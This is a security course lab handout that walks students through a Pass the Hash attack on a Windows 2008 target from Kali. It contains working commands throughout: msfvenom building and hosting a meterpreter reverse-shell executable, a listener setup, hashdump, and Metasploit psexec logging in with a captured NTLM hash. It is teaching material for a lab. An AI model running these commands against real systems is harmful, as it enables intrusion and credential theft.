Proj 14x: Pass The Hash (10 pts. extra credit)

What You Need for this Project

A Windows 2008 target
A Kali machine to act as the attacker

Purpose

To practice the Pass the Hash attack in a non-domain environment.

Task 1: Getting Hashes

Exploiting the Target with a Malicious Download

First we'll get the password hashes from the target, using malware. Launch your Kali machine.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 LPORT=4445 -f exe > /var/www/html/mal.exe service apache2 start

In Kali, execute these commands to start a C&C listener.

msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.1.188 set LPORT 4445 exploit

On your Windows target, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:

http://172.16.1.188/mal.exe

Download mal.exe and run it.

On your Kali machine, a meterpeter session opens, as shown below.

Execute these commands to start interacting with the Meterpreter shell and dump the hashes:

sessions -i 1 hashdump

Notice the highlighted text in the image above. This is the Administrator password hash, which we will use later.

Execute this command to close the Meterpreter session.

exit

Task 2: Passing the Hash

Suppose you are attacking a company and you trick one user into running malware, so you get some hashes from that machine.

The hashes might work on other machines at the same company. In our case we'll attack the same target, but in a real pentest you'd be attacking a different machine.

Using Metasploit's Psexec Module

On Kali, in Metasploit, Execute these commands:

use windows/smb/psexec show options

As shown below, there are options for a username and password.

The amazing thing about the pass-the-hash attack is that the password hashes work fine without cracking them.

In Metasploit, execute these commands, replacing the IP address with the IP address of your target system:

set RHOST 172.16.1.197 set SMBUser Administrator set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 exploit

A Meterpreter session opens, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown above:

set SMBPASS to a long hash value
Meterpreter session ... opened

Save a FULL DESKTOP image with the filename Proj 14x from Your Name.

Turning in Your Project

Send the image as an email attachment to cnit.124m@gmail.com with a Subject line of Proj 14x from Your Name.

References

Pass-the-hash attacks: Tools and Mitigation (2010)

Posted 9-22-17 by Sam Bowne
Revised 9-25-17